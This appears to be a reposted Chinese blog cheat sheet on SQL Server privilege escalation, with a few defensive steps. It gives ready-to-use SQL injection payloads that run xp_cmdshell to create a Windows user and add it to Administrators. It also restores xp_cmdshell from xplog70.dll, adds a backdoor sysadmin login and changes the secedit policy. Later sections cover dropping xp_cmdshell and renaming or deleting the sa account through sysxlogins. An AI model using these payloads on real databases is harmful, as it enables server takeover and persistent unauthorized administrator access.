zoukankan      html  css  js  c++  java
  • SQL Server 提升权限相关命令及防范

    SQL Server 提升权限相关命令及防范
    ;exec master..xp_cmdshell "net user name password /add"--
    ;exec master..xp_cmdshell "net localgroup administrators name /add"--

    程序代码开启cmdshell的SQL语句

    EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

    判断存储扩展是否存在
    select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
    返回结果为1就OK

    恢复xp_cmdshell
    Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
    返回结果为1就OK

    否则上传xplog7.0.dll
    Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

    堵上cmdshell的SQL语句
    sp_dropextendedproc "xp_cmdshell"


    DOS:
    dir c:/
    dir d:/
    dir e:/

    net user TsInternetUsers Password /add
    net localGroup Administrators TsInternetUsers /add

    备份恢复IPSEC

    secedit /export /CFG c:/tmp.inf
    echo sedenynetworklogonright =>>c:/tmp.inf
    secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

    SQL:
    exec master..sp_addlogin UserName,Password
    exec master..sp_addsrvrolemember UserName,sysadmin


    sa帐号的改名和删除
    首先打开SQL中的企业管理器,接着在工具选项卡中选择SQL server配置属性依次,点服务器设置,看到允许对系统目录直接进行修改前面的方框吗,点一下,好。
    再打开查询分析器,登陆进去(呵呵,随便你用什么帐号进去,不过可一定要在master数据库中有db_owner的权限)输入

    update sysxlogins set name='你要改成的名字' where sid=0x01
    update sysxlogins set sid=0xE765555BD44F054F89CD0076A06EA823 where name='你要改成的名字'

    OK,执行成功,好拉,转道企业管理器中刷新安全性中的登陆,看看,sa是不是变成xwq拉,呵呵,选中xwq点击右键,怎么样是不是出现拉删除的选项,呵呵,删除。看看sa是不是已经没有拉。


    后记

    直接在查询分析器里怎么删除sa

    直接在查询分析器里怎么删除sa,做法和前面所说的差不多,只不过这次不是在企业管理器中做手脚拉,而是利用sql提供给我们功能强大的存储过程来完成这项任务。下面就是我所说的需要利用的存储过程sp_configure,sp_configure显示或更改当前服务器的全局配置设置。
    它的语法:

    sp_configure [ [ @configname = ] 'name' ]
    [ , [ @configvalue = ] 'value' ]

    实例:

    sp_configure 'allow updates', 1
    go
    RECONFIGURE WITH OVERRIDE
    go

    好拉,这样我们就可以更新系统表拉,接下来和前面的做法一样拉 update sysxlogins set name='你要改成的名字' where sid=0x01,然后再删除"你改名后的那个名字"
    不过要注意在 sp_configure 上没有参数(或只有第一个参数)的执行许可权限默认授予所有用户。有两个参数的 sp_configure(用于更改配置选项)的执行许可权限默认授予 sysadmin 和 serveradmin 固定服务器角色。RECONFIGURE 权限默认授予 sysadmin 固定服务器角色和 serveradmin 固定服务器角色,并且不能传输。还得在master中是db_owner。
  • 相关阅读:
    古典密码仿射密码Affine
    git 修改远程仓库地址的方法
    git 修改已经 commit 的用户名和邮箱
    git 调整commit之间的顺序
    Go 逃逸分析
    docker 镜像中的 @sha256:cbeaf907fc78ac97ce7b625e4bf0de16e3ea725daf6b04f930bd14c67c671ff9 (digest)是什么意思
    Docker镜像列表中的<none>:<none>是什么镜像
    github 下fork后如何同步源的新更新内容
    SQL 中 exists 的用法
    OLEDB的Excel的IMEX和HDR是什么意思
  • 原文地址:https://www.cnblogs.com/Dicky/p/134904.html
Copyright © 2011-2022 走看看